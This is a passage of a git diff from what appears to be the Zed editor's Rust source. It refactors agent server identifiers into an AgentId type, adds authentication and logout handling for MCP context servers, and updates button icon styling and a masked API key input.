self.name(); + let agent_id = self.agent_id(); let config_id = config_id.to_string(); let value_id = value_id.map(|s| s.to_string()); update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| default_settings_for_agent(&name, cx)); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); match settings { settings::CustomAgentServerSettings::Custom { @@ -287,21 +292,17 @@ impl AgentServer for CustomAgentServer { fn connect( &self, delegate: AgentServerDelegate, + project: Entity, cx: &mut App, ) -> Task>> { - let name = self.name(); - let display_name = delegate - .store - .read(cx) - .agent_display_name(&ExternalAgentServerName(name.clone())) - .unwrap_or_else(|| name.clone()); + let agent_id = self.agent_id(); let default_mode = self.default_mode(cx); let 
default_model = self.default_model(cx); - let is_registry_agent = is_registry_agent(&name, cx); + let is_registry_agent = is_registry_agent(agent_id.clone(), cx); let default_config_options = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().as_ref()) .map(|s| match s { project::agent_server_store::CustomAgentServerSettings::Custom { default_config_options, @@ -330,11 +331,11 @@ impl AgentServer for CustomAgentServer { extra_env.insert("NO_BROWSER".to_owned(), "1".to_owned()); } if is_registry_agent { - match name.as_ref() { - CLAUDE_AGENT_NAME => { + match agent_id.as_ref() { + CLAUDE_AGENT_ID => { extra_env.insert("ANTHROPIC_API_KEY".into(), "".into()); } - CODEX_NAME => { + CODEX_ID => { if let Ok(api_key) = std::env::var("CODEX_API_KEY") { extra_env.insert("CODEX_API_KEY".into(), api_key); } @@ -342,7 +343,7 @@ impl AgentServer for CustomAgentServer { extra_env.insert("OPEN_AI_API_KEY".into(), api_key); } } - GEMINI_NAME => { + GEMINI_ID => { extra_env.insert("SURFACE".to_owned(), "zed".to_owned()); } _ => {} @@ -350,29 +351,26 @@ impl AgentServer for CustomAgentServer { } let store = delegate.store.downgrade(); cx.spawn(async move |cx| { - if is_registry_agent && name.as_ref() == GEMINI_NAME { + if is_registry_agent && agent_id.as_ref() == GEMINI_ID { if let Some(api_key) = cx.update(api_key_for_gemini_cli).await.ok() { extra_env.insert("GEMINI_API_KEY".into(), api_key); } } let command = store .update(cx, |store, cx| { - let agent = store - .get_external_agent(&ExternalAgentServerName(name.clone())) - .with_context(|| { - format!("Custom agent server `{}` is not registered", name) - })?; + let agent = store.get_external_agent(&agent_id).with_context(|| { + format!("Custom agent server `{}` is not registered", agent_id) + })?; anyhow::Ok(agent.get_command( extra_env, - delegate.status_tx, delegate.new_version_available, &mut cx.to_async(), )) })?? 
.await?; let connection = crate::acp::connect( - name, - display_name, + agent_id, + project, command, default_mode, default_model, @@ -406,15 +404,15 @@ fn api_key_for_gemini_cli(cx: &mut App) -> Task> { }) } -fn is_registry_agent(name: &str, cx: &App) -> bool { - let is_previous_built_in = matches!(name, CLAUDE_AGENT_NAME | CODEX_NAME | GEMINI_NAME); +fn is_registry_agent(agent_id: impl Into, cx: &App) -> bool { + let agent_id = agent_id.into(); let is_in_registry = project::AgentRegistryStore::try_global(cx) - .map(|store| store.read(cx).agent(name).is_some()) + .map(|store| store.read(cx).agent(&agent_id).is_some()) .unwrap_or(false); let is_settings_registry = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(name) + .get(agent_id.as_ref()) .is_some_and(|s| { matches!( s, @@ -422,11 +420,14 @@ fn is_registry_agent(name: &str, cx: &App) -> bool { ) }) }); - is_previous_built_in || is_in_registry || is_settings_registry + is_in_registry || is_settings_registry } -fn default_settings_for_agent(name: &str, cx: &App) -> settings::CustomAgentServerSettings { - if is_registry_agent(name, cx) { +fn default_settings_for_agent( + agent_id: impl Into, + cx: &App, +) -> settings::CustomAgentServerSettings { + if is_registry_agent(agent_id, cx) { settings::CustomAgentServerSettings::Registry { default_model: None, default_mode: None, @@ -456,6 +457,7 @@ mod tests { AgentRegistryStore, RegistryAgent, RegistryAgentMetadata, RegistryNpxAgent, }; use settings::Settings as _; + use ui::SharedString; fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { @@ -471,11 +473,12 @@ mod tests { let id = SharedString::from(id.to_string()); RegistryAgent::Npx(RegistryNpxAgent { metadata: RegistryAgentMetadata { - id: id.clone(), + id: AgentId::new(id.clone()), name: id.clone(), description: SharedString::from(""), version: SharedString::from("1.0.0"), repository: None, + website: None, icon_path: None, }, package: id, @@ -506,16 +509,6 @@ mod tests { }); } - 
#[gpui::test] - fn test_previous_builtins_are_registry(cx: &mut TestAppContext) { - init_test(cx); - cx.update(|cx| { - assert!(is_registry_agent(CLAUDE_AGENT_NAME, cx)); - assert!(is_registry_agent(CODEX_NAME, cx)); - assert!(is_registry_agent(GEMINI_NAME, cx)); - }); - } - #[gpui::test] fn test_unknown_agent_is_not_registry(cx: &mut TestAppContext) { init_test(cx); @@ -578,25 +571,6 @@ mod tests { }); } - #[gpui::test] - fn test_default_settings_for_builtin_agent(cx: &mut TestAppContext) { - init_test(cx); - cx.update(|cx| { - assert!(matches!( - default_settings_for_agent(CODEX_NAME, cx), - settings::CustomAgentServerSettings::Registry { .. } - )); - assert!(matches!( - default_settings_for_agent(CLAUDE_AGENT_NAME, cx), - settings::CustomAgentServerSettings::Registry { .. } - )); - assert!(matches!( - default_settings_for_agent(GEMINI_NAME, cx), - settings::CustomAgentServerSettings::Registry { .. } - )); - }); - } - #[gpui::test] fn test_default_settings_for_extension_agent(cx: &mut TestAppContext) { init_test(cx); diff --git a/crates/agent_servers/src/e2e_tests.rs b/crates/agent_servers/src/e2e_tests.rs index a0150d41726c94dc830be70e006f4370de919ead..956d106df2a260bd2eb31c14f4f1f1705bf74cd6 100644 --- a/crates/agent_servers/src/e2e_tests.rs +++ b/crates/agent_servers/src/e2e_tests.rs @@ -14,6 +14,7 @@ use std::{ time::Duration, }; use util::path; +use util::path_list::PathList; pub async fn test_basic(server: F, cx: &mut TestAppContext) where @@ -207,8 +208,10 @@ pub async fn test_tool_call_with_permission( thread.update(cx, |thread, cx| { thread.authorize_tool_call( tool_call_id, - allow_option_id, - acp::PermissionOptionKind::AllowOnce, + acp_thread::SelectedPermissionOutcome::new( + allow_option_id, + acp::PermissionOptionKind::AllowOnce, + ), cx, ); @@ -431,13 +434,18 @@ pub async fn new_test_thread( cx: &mut TestAppContext, ) -> Entity { let store = project.read_with(cx, |project, _| project.agent_server_store().clone()); - let delegate = 
AgentServerDelegate::new(store, project.clone(), None, None); + let delegate = AgentServerDelegate::new(store, None); - let connection = cx.update(|cx| server.connect(delegate, cx)).await.unwrap(); - - cx.update(|cx| connection.new_session(project.clone(), current_dir.as_ref(), cx)) + let connection = cx + .update(|cx| server.connect(delegate, project.clone(), cx)) .await - .unwrap() + .unwrap(); + + cx.update(|cx| { + connection.new_session(project.clone(), PathList::new(&[current_dir.as_ref()]), cx) + }) + .await + .unwrap() } pub async fn run_until_first_tool_call( diff --git a/crates/agent_settings/src/agent_settings.rs b/crates/agent_settings/src/agent_settings.rs index 02341af42b9247ba07cb3f8c771a51626cd721ed..d5d4f16eb742a92f6abf8081c43709f161ef4038 100644 --- a/crates/agent_settings/src/agent_settings.rs +++ b/crates/agent_settings/src/agent_settings.rs @@ -12,7 +12,7 @@ use schemars::JsonSchema; use serde::{Deserialize, Serialize}; use settings::{ DefaultAgentView, DockPosition, LanguageModelParameters, LanguageModelSelection, - NotifyWhenAgentWaiting, RegisterSetting, Settings, ToolPermissionMode, + NewThreadLocation, NotifyWhenAgentWaiting, RegisterSetting, Settings, ToolPermissionMode, }; pub use crate::agent_profile::*; @@ -51,6 +51,7 @@ pub struct AgentSettings { pub message_editor_min_lines: usize, pub show_turn_stats: bool, pub tool_permissions: ToolPermissions, + pub new_thread_location: NewThreadLocation, } impl AgentSettings { @@ -438,6 +439,7 @@ impl Settings for AgentSettings { message_editor_min_lines: agent.message_editor_min_lines.unwrap(), show_turn_stats: agent.show_turn_stats.unwrap(), tool_permissions: compile_tool_permissions(agent.tool_permissions), + new_thread_location: agent.new_thread_location.unwrap_or_default(), } } } diff --git a/crates/agent_ui/Cargo.toml b/crates/agent_ui/Cargo.toml index 8b06417d2f5812ef2e0fb265e6afa4cfeb26eb3f..b60f2a6b136c5e4dbb131603d95623a719ce7134 100644 --- a/crates/agent_ui/Cargo.toml +++ 
b/crates/agent_ui/Cargo.toml @@ -34,7 +34,7 @@ agent_servers.workspace = true agent_settings.workspace = true ai_onboarding.workspace = true anyhow.workspace = true -arrayvec.workspace = true +heapless.workspace = true assistant_text_thread.workspace = true assistant_slash_command.workspace = true assistant_slash_commands.workspace = true diff --git a/crates/agent_ui/src/agent_configuration.rs b/crates/agent_ui/src/agent_configuration.rs index aa316ba7c5efe5f679764cd7d4626a1f1310e4c6..fc5a78dfc936617f3782eae154b6a13531e5c425 100644 --- a/crates/agent_ui/src/agent_configuration.rs +++ b/crates/agent_ui/src/agent_configuration.rs @@ -28,7 +28,7 @@ use language_model::{ use language_models::AllLanguageModelSettings; use notifications::status_toast::{StatusToast, ToastIcon}; use project::{ - agent_server_store::{AgentServerStore, ExternalAgentServerName, ExternalAgentSource}, + agent_server_store::{AgentId, AgentServerStore, ExternalAgentSource}, context_server_store::{ContextServerConfiguration, ContextServerStatus, ContextServerStore}, }; use settings::{Settings, SettingsStore, update_settings_file}; @@ -228,6 +228,7 @@ impl AgentConfiguration { .unwrap_or(false); v_flex() + .min_w_0() .w_full() .when(is_expanded, |this| this.mb_2()) .child( @@ -312,6 +313,7 @@ impl AgentConfiguration { ) .child( v_flex() + .min_w_0() .w_full() .px_2() .gap_1() @@ -330,10 +332,11 @@ impl AgentConfiguration { .full_width() .style(ButtonStyle::Outlined) .layer(ElevationIndex::ModalSurface) - .icon_position(IconPosition::Start) - .icon(IconName::Thread) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Thread) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small) .on_click(cx.listener({ let provider = provider.clone(); @@ -355,10 +358,11 @@ impl AgentConfiguration { ) .full_width() .style(ButtonStyle::Outlined) - .icon_position(IconPosition::Start) - .icon(IconName::Trash) - .icon_size(IconSize::Small) - 
.icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Trash) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small) .on_click(cx.listener({ let provider = provider.clone(); @@ -424,10 +428,11 @@ impl AgentConfiguration { .trigger( Button::new("add-provider", "Add Provider") .style(ButtonStyle::Outlined) - .icon_position(IconPosition::Start) - .icon(IconName::Plus) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small), ) .menu({ @@ -459,6 +464,7 @@ impl AgentConfiguration { }); v_flex() + .min_w_0() .w_full() .child(self.render_section_title( "LLM Providers", @@ -498,6 +504,7 @@ impl AgentConfiguration { Plan::ZedFree => ("Free", Color::Default, free_chip_bg), Plan::ZedProTrial => ("Pro Trial", Color::Accent, pro_chip_bg), Plan::ZedPro => ("Pro", Color::Accent, pro_chip_bg), + Plan::ZedBusiness => ("Business", Color::Accent, pro_chip_bg), Plan::ZedStudent => ("Student", Color::Accent, pro_chip_bg), }; @@ -510,21 +517,18 @@ impl AgentConfiguration { } } - fn render_context_servers_section( - &mut self, - window: &mut Window, - cx: &mut Context, - ) -> impl IntoElement { + fn render_context_servers_section(&mut self, cx: &mut Context) -> impl IntoElement { let context_server_ids = self.context_server_store.read(cx).server_ids(); let add_server_popover = PopoverMenu::new("add-server-popover") .trigger( Button::new("add-server", "Add Server") .style(ButtonStyle::Outlined) - .icon_position(IconPosition::Start) - .icon(IconName::Plus) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small), ) .menu({ @@ -559,6 +563,7 @@ impl AgentConfiguration { }); v_flex() + .min_w_0() .border_b_1() .border_color(cx.theme().colors().border) .child(self.render_section_title( @@ -592,7 +597,7 @@ 
impl AgentConfiguration { } else { parent.children(itertools::intersperse_with( context_server_ids.iter().cloned().map(|context_server_id| { - self.render_context_server(context_server_id, window, cx) + self.render_context_server(context_server_id, cx) .into_any_element() }), || { @@ -609,7 +614,6 @@ impl AgentConfiguration { fn render_context_server( &self, context_server_id: ContextServerId, - window: &mut Window, cx: &Context, ) -> impl use<> + IntoElement { let server_status = self @@ -637,6 +641,9 @@ impl AgentConfiguration { } else { None }; + let auth_required = matches!(server_status, ContextServerStatus::AuthRequired); + let authenticating = matches!(server_status, ContextServerStatus::Authenticating); + let context_server_store = self.context_server_store.clone(); let tool_count = self .context_server_registry @@ -680,11 +687,33 @@ impl AgentConfiguration { Indicator::dot().color(Color::Muted).into_any_element(), "Server is stopped.", ), + ContextServerStatus::AuthRequired => ( + Indicator::dot().color(Color::Warning).into_any_element(), + "Authentication required.", + ), + ContextServerStatus::Authenticating => ( + Icon::new(IconName::LoadCircle) + .size(IconSize::XSmall) + .color(Color::Accent) + .with_keyed_rotate_animation( + SharedString::from(format!("{}-authenticating", context_server_id.0)), + 3, + ) + .into_any_element(), + "Waiting for authorization...", + ), }; + let is_remote = server_configuration .as_ref() .map(|config| matches!(config.as_ref(), ContextServerConfiguration::Http { .. })) .unwrap_or(false); + + let should_show_logout_button = server_configuration.as_ref().is_some_and(|config| { + matches!(config.as_ref(), ContextServerConfiguration::Http { .. 
}) + && !config.has_static_auth_header() + }); + let context_server_configuration_menu = PopoverMenu::new("context-server-config-menu") .trigger_with_tooltip( IconButton::new("context-server-config-menu", IconName::Settings) @@ -699,6 +728,7 @@ impl AgentConfiguration { let language_registry = self.language_registry.clone(); let workspace = self.workspace.clone(); let context_server_registry = self.context_server_registry.clone(); + let context_server_store = context_server_store.clone(); move |window, cx| { Some(ContextMenu::build(window, cx, |menu, _window, _cx| { @@ -745,6 +775,17 @@ impl AgentConfiguration { .ok(); } })) + .when(should_show_logout_button, |this| { + this.entry("Log Out", None, { + let context_server_store = context_server_store.clone(); + let context_server_id = context_server_id.clone(); + move |_window, cx| { + context_server_store.update(cx, |store, cx| { + store.logout_server(&context_server_id, cx).log_err(); + }); + } + }) + }) .separator() .entry("Uninstall", None, { let fs = fs.clone(); @@ -801,10 +842,16 @@ impl AgentConfiguration { } }); + let feedback_base_container = + || h_flex().py_1().min_w_0().w_full().gap_1().justify_between(); + v_flex() + .min_w_0() .id(item_id.clone()) .child( h_flex() + .min_w_0() + .w_full() .justify_between() .child( h_flex() @@ -820,13 +867,13 @@ impl AgentConfiguration { .tooltip(Tooltip::text(tooltip_text)) .child(status_indicator), ) - .child(Label::new(item_id).truncate()) + .child(Label::new(item_id).flex_shrink_0().truncate()) .child( div() .id("extension-source") + .min_w_0() .mt_0p5() .mx_1() - .flex_none() .tooltip(Tooltip::text(source_tooltip)) .child( Icon::new(source_icon) @@ -856,6 +903,7 @@ impl AgentConfiguration { .on_click({ let context_server_manager = self.context_server_store.clone(); let fs = self.fs.clone(); + let context_server_id = context_server_id.clone(); move |state, _window, cx| { let is_enabled = match state { @@ -903,32 +951,113 @@ impl AgentConfiguration { ) .map(|parent| 
{ if let Some(error) = error { + return parent + .child( + feedback_base_container() + .child( + h_flex() + .pr_4() + .min_w_0() + .w_full() + .gap_2() + .child( + Icon::new(IconName::XCircle) + .size(IconSize::XSmall) + .color(Color::Error), + ) + .child( + div().min_w_0().flex_1().child( + Label::new(error) + .color(Color::Muted) + .size(LabelSize::Small), + ), + ), + ) + .when(should_show_logout_button, |this| { + this.child( + Button::new("error-logout-server", "Log Out") + .style(ButtonStyle::Outlined) + .label_size(LabelSize::Small) + .on_click({ + let context_server_store = + context_server_store.clone(); + let context_server_id = + context_server_id.clone(); + move |_event, _window, cx| { + context_server_store.update( + cx, + |store, cx| { + store + .logout_server( + &context_server_id, + cx, + ) + .log_err(); + }, + ); + } + }), + ) + }), + ); + } + if auth_required { return parent.child( - h_flex() - .gap_2() - .pr_4() - .items_start() + feedback_base_container() .child( h_flex() - .flex_none() - .h(window.line_height() / 1.6_f32) - .justify_center() + .pr_4() + .min_w_0() + .w_full() + .gap_2() .child( - Icon::new(IconName::XCircle) + Icon::new(IconName::Info) .size(IconSize::XSmall) - .color(Color::Error), + .color(Color::Muted), + ) + .child( + Label::new("Authenticate to connect this server") + .color(Color::Muted) + .size(LabelSize::Small), ), ) .child( - div().w_full().child( - Label::new(error) - .buffer_font(cx) - .color(Color::Muted) - .size(LabelSize::Small), - ), + Button::new("error-logout-server", "Authenticate") + .style(ButtonStyle::Outlined) + .label_size(LabelSize::Small) + .on_click({ + let context_server_store = context_server_store.clone(); + let context_server_id = context_server_id.clone(); + move |_event, _window, cx| { + context_server_store.update(cx, |store, cx| { + store + .authenticate_server(&context_server_id, cx) + .log_err(); + }); + } + }), ), ); } + if authenticating { + return parent.child( + h_flex() + .mt_1() + 
.pr_4() + .min_w_0() + .w_full() + .gap_2() + .child( + div().size_3().flex_shrink_0(), // Alignment Div + ) + .child( + Label::new("Authenticating…") + .color(Color::Muted) + .size(LabelSize::Small), + ), + + ); + } parent }) } @@ -962,10 +1091,11 @@ impl AgentConfiguration { .trigger( Button::new("add-agent", "Add Agent") .style(ButtonStyle::Outlined) - .icon_position(IconPosition::Start) - .icon(IconName::Plus) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::Small) + .color(Color::Muted), + ) .label_size(LabelSize::Small), ) .menu({ @@ -1019,6 +1149,7 @@ impl AgentConfiguration { }); v_flex() + .min_w_0() .border_b_1() .border_color(cx.theme().colors().border) .child( @@ -1089,7 +1220,7 @@ impl AgentConfiguration { ExternalAgentSource::Custom => None, }; - let agent_server_name = ExternalAgentServerName(id.clone()); + let agent_server_name = AgentId(id.clone()); let uninstall_button = match source { ExternalAgentSource::Extension => Some( @@ -1217,9 +1348,10 @@ impl Render for AgentConfiguration { .id("assistant-configuration-content") .track_scroll(&self.scroll_handle) .size_full() + .min_w_0() .overflow_y_scroll() .child(self.render_agent_servers_section(cx)) - .child(self.render_context_servers_section(window, cx)) + .child(self.render_context_servers_section(cx)) .child(self.render_provider_configuration_section(cx)), ) .vertical_scrollbar_for(&self.scroll_handle, window, cx), diff --git a/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs b/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs index a3a389ac0a068d92112ee98caacb2986c499ad86..334aaf4026527938144cf12e25c9a7a23d5c28ac 100644 --- a/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs +++ b/crates/agent_ui/src/agent_configuration/add_llm_provider_modal.rs @@ -68,14 +68,17 @@ impl AddLlmProviderInput { let provider_name = single_line_input("Provider Name", provider.name(), None, 1, 
window, cx); let api_url = single_line_input("API URL", provider.api_url(), None, 2, window, cx); - let api_key = single_line_input( - "API Key", - "000000000000000000000000000000000000000000000000", - None, - 3, - window, - cx, - ); + let api_key = cx.new(|cx| { + InputField::new( + window, + cx, + "000000000000000000000000000000000000000000000000", + ) + .label("API Key") + .tab_index(3) + .tab_stop(true) + .masked(true) + }); Self { provider_name, @@ -340,10 +343,11 @@ impl AddLlmProviderModal { .child(Label::new("Models").size(LabelSize::Small)) .child( Button::new("add-model", "Add Model") - .icon(IconName::Plus) - .icon_position(IconPosition::Start) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Plus) + .size(IconSize::XSmall) + .color(Color::Muted), + ) .label_size(LabelSize::Small) .on_click(cx.listener(|this, _, window, cx| { this.input.add_model(window, cx); @@ -446,10 +450,11 @@ impl AddLlmProviderModal { .when(has_more_than_one_model, |this| { this.child( Button::new(("remove-model", ix), "Remove Model") - .icon(IconName::Trash) - .icon_position(IconPosition::Start) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::Trash) + .size(IconSize::XSmall) + .color(Color::Muted), + ) .label_size(LabelSize::Small) .style(ButtonStyle::Outlined) .full_width() diff --git a/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs b/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs index 38805f2c26693f168c7273afddf5aceea44f83e3..e550d59c0ccb4deab40f6fcbc39dae124e3c08db 100644 --- a/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs +++ b/crates/agent_ui/src/agent_configuration/configure_context_server_modal.rs @@ -1,25 +1,27 @@ -use std::sync::{Arc, Mutex}; - use anyhow::{Context as _, Result}; use collections::HashMap; use context_server::{ContextServerCommand, ContextServerId}; use editor::{Editor, 
EditorElement, EditorStyle}; + use gpui::{ AsyncWindowContext, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, ScrollHandle, - Task, TextStyle, TextStyleRefinement, UnderlineStyle, WeakEntity, prelude::*, + Subscription, Task, TextStyle, TextStyleRefinement, UnderlineStyle, WeakEntity, prelude::*, }; use language::{Language, LanguageRegistry}; use markdown::{Markdown, MarkdownElement, MarkdownStyle}; use notifications::status_toast::{StatusToast, ToastIcon}; +use parking_lot::Mutex; use project::{ context_server_store::{ - ContextServerStatus, ContextServerStore, registry::ContextServerDescriptorRegistry, + ContextServerStatus, ContextServerStore, ServerStatusChangedEvent, + registry::ContextServerDescriptorRegistry, }, project_settings::{ContextServerSettings, ProjectSettings}, worktree_store::WorktreeStore, }; use serde::Deserialize; use settings::{Settings as _, update_settings_file}; +use std::sync::Arc; use theme::ThemeSettings; use ui::{ CommonAnimationExt, KeyBinding, Modal, ModalFooter, ModalHeader, Section, Tooltip, @@ -237,6 +239,8 @@ fn context_server_input(existing: Option<(ContextServerId, ContextServerCommand) format!( r#"{{ + /// Configure an MCP server that runs locally via stdin/stdout + /// /// The name of your MCP server "{name}": {{ /// The command which runs the MCP server @@ -280,6 +284,8 @@ fn context_server_http_input( format!( r#"{{ + /// Configure an MCP server that you connect to over HTTP + /// /// The name of your remote MCP server "{name}": {{ /// The URL of the remote MCP server @@ -342,6 +348,8 @@ fn resolve_context_server_extension( enum State { Idle, Waiting, + AuthRequired { server_id: ContextServerId }, + Authenticating { _server_id: ContextServerId }, Error(SharedString), } @@ -352,6 +360,7 @@ pub struct ConfigureContextServerModal { state: State, original_server_id: Option, scroll_handle: ScrollHandle, + _auth_subscription: Option, } impl ConfigureContextServerModal { @@ -475,6 +484,7 @@ impl 
ConfigureContextServerModal { cx, ), scroll_handle: ScrollHandle::new(), + _auth_subscription: None, }) }) }) @@ -486,6 +496,13 @@ impl ConfigureContextServerModal { } fn confirm(&mut self, _: &menu::Confirm, cx: &mut Context) { + if matches!( + self.state, + State::Waiting | State::AuthRequired { .. } | State::Authenticating { .. } + ) { + return; + } + self.state = State::Idle; let Some(workspace) = self.workspace.upgrade() else { return; @@ -515,14 +532,19 @@ impl ConfigureContextServerModal { async move |this, cx| { let result = wait_for_context_server_task.await; this.update(cx, |this, cx| match result { - Ok(_) => { + Ok(ContextServerStatus::Running) => { this.state = State::Idle; this.show_configured_context_server_toast(id, cx); cx.emit(DismissEvent); } + Ok(ContextServerStatus::AuthRequired) => { + this.state = State::AuthRequired { server_id: id }; + cx.notify(); + } Err(err) => { this.set_error(err, cx); } + Ok(_) => {} }) } }) @@ -558,6 +580,49 @@ impl ConfigureContextServerModal { cx.emit(DismissEvent); } + fn authenticate(&mut self, server_id: ContextServerId, cx: &mut Context) { + self.context_server_store.update(cx, |store, cx| { + store.authenticate_server(&server_id, cx).log_err(); + }); + + self.state = State::Authenticating { + _server_id: server_id.clone(), + }; + + self._auth_subscription = Some(cx.subscribe( + &self.context_server_store, + move |this, _, event: &ServerStatusChangedEvent, cx| { + if event.server_id != server_id { + return; + } + match &event.status { + ContextServerStatus::Running => { + this._auth_subscription = None; + this.state = State::Idle; + this.show_configured_context_server_toast(event.server_id.clone(), cx); + cx.emit(DismissEvent); + } + ContextServerStatus::AuthRequired => { + this._auth_subscription = None; + this.state = State::AuthRequired { + server_id: event.server_id.clone(), + }; + cx.notify(); + } + ContextServerStatus::Error(error) => { + this._auth_subscription = None; + this.set_error(error.clone(), 
cx); + } + ContextServerStatus::Authenticating + | ContextServerStatus::Starting + | ContextServerStatus::Stopped => {} + } + }, + )); + + cx.notify(); + } + fn show_configured_context_server_toast(&self, id: ContextServerId, cx: &mut App) { self.workspace .update(cx, { @@ -615,7 +680,8 @@ impl ConfigureContextServerModal { } fn render_modal_description(&self, window: &mut Window, cx: &mut Context) -> AnyElement { - const MODAL_DESCRIPTION: &str = "Visit the MCP server configuration docs to find all necessary arguments and environment variables."; + const MODAL_DESCRIPTION: &str = + "Check the server docs for required arguments and environment variables."; if let ConfigurationSource::Extension { installation_instructions: Some(installation_instructions), @@ -637,6 +703,67 @@ impl ConfigureContextServerModal { } } + fn render_tab_bar(&self, cx: &mut Context) -> Option { + let is_http = match &self.source { + ConfigurationSource::New { is_http, .. } => *is_http, + _ => return None, + }; + + let tab = |label: &'static str, active: bool| { + div() + .id(label) + .cursor_pointer() + .p_1() + .text_sm() + .border_b_1() + .when(active, |this| { + this.border_color(cx.theme().colors().border_focused) + }) + .when(!active, |this| { + this.border_color(gpui::transparent_black()) + .text_color(cx.theme().colors().text_muted) + .hover(|s| s.text_color(cx.theme().colors().text)) + }) + .child(label) + }; + + Some( + h_flex() + .pt_1() + .mb_2p5() + .gap_1() + .border_b_1() + .border_color(cx.theme().colors().border.opacity(0.5)) + .child( + tab("Local", !is_http).on_click(cx.listener(|this, _, window, cx| { + if let ConfigurationSource::New { editor, is_http } = &mut this.source { + if *is_http { + *is_http = false; + let new_text = context_server_input(None); + editor.update(cx, |editor, cx| { + editor.set_text(new_text, window, cx); + }); + } + } + })), + ) + .child( + tab("Remote", is_http).on_click(cx.listener(|this, _, window, cx| { + if let ConfigurationSource::New { 
editor, is_http } = &mut this.source { + if !*is_http { + *is_http = true; + let new_text = context_server_http_input(None); + editor.update(cx, |editor, cx| { + editor.set_text(new_text, window, cx); + }); + } + } + })), + ) + .into_any_element(), + ) + } + fn render_modal_content(&self, cx: &App) -> AnyElement { let editor = match &self.source { ConfigurationSource::New { editor, .. } => editor, @@ -682,7 +809,10 @@ impl ConfigureContextServerModal { fn render_modal_footer(&self, cx: &mut Context) -> ModalFooter { let focus_handle = self.focus_handle(cx); - let is_connecting = matches!(self.state, State::Waiting); + let is_busy = matches!( + self.state, + State::Waiting | State::AuthRequired { .. } | State::Authenticating { .. } + ); ModalFooter::new() .start_slot::